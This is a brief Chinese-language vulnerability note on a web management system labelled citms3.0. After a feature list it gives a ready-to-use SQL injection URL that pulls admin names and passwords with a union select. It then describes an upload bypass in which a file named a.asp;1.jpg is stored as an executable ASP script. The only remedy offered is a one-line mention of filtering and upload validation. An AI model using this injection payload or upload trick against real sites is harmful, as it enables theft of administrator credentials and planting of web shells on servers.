管理系统部分功能如下:
(1)在线增加、修改、删除管理员
(2)在线增加、修改、删除客户记录、支持HTML等..
(3)前台记录有追踪功能..以及追踪记录和点击次数显示
源码下载:
注入:
/citms3.0/list.asp?id=1320 union select 1,name,3,pass,5,6,7,8,9,10,11,12,13,14,15,16 from admin
上传
/soft/demo/citms3.0/upload_pic.asp
上传a.asp;1.jpg 成功后得到:a.asp;随机数.jpg
如: /a.asp;131672.jpg
修复:
加入过滤和上传验证
